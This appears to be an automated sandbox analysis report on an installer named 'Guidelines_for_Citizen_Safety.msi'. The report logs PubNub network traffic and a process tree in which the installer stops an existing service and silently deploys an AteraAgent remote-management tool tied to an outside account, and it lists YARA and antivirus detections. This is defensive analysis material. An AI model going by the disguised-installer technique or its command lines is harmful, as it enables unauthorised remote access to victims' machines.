                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 7
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:30 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          34192.168.2.75008113.232.67.198443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:32 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=1be45d8e-3b2c-4ea5-a5b7-07647d59b850&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:33 UTC323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:32 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:33 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          35192.168.2.75008313.232.67.198443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:35 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=50d6fee0-b13e-4824-8baa-cb59cf186680&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:35 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:35 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:35 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 35 35 33 30 33 38 32 38 34 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434553038284]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          36192.168.2.75008713.232.67.198443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:37 UTC340OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=a0a85a46-f9d7-4b43-9103-c66ecd6f79b0&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:38 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:38 UTC45INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 34 31 35 32 33 36 38 37 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434415236874","r":31},"m":[]}


                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:05:15:20
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75f4c0000
                                                                                                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:05:15:20
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75f4c0000
                                                                                                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:05:15:21
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F
                                                                                                                                                                                                                                                                          Imagebase:0xc30000
                                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:05:15:21
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:05:15:22
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:05:15:28
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000
                                                                                                                                                                                                                                                                          Imagebase:0xc30000
                                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                                                                                                                          File size:47'104 bytes
                                                                                                                                                                                                                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                                                          Imagebase:0xd90000
                                                                                                                                                                                                                                                                          File size:139'776 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                                          File size:74'240 bytes
                                                                                                                                                                                                                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                          Start time:05:15:32
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"
                                                                                                                                                                                                                                                                          Imagebase:0x158ec7a0000
                                                                                                                                                                                                                                                                          File size:145'968 bytes
                                                                                                                                                                                                                                                                          MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1539508523.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1539023783.00007FFAAB4E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.000001588008C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.0000015880135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.00000158800B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.0000015880089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1533766772.00000158EC911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1537471670.00000158EF00F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.0000015880166000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.000001588017C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1533766772.00000158EC8F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1534928967.00000158ECC70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.0000015880132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1535130390.00000158EED07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1534693528.00000158ECB50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.00000158800BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.00000158800B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1533766772.00000158EC8D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.1532838570.0000015880001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:05:15:37
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x18896d70000
                                                                                                                                                                                                                                                                          File size:145'968 bytes
                                                                                                                                                                                                                                                                          MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637180822.0000018896E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637942103.00000188970C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637180822.0000018896E78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2643291786.00000188AFF9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2643291786.00000188B003D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637091889.0000018896E20000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2634811846.0000004329CF5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
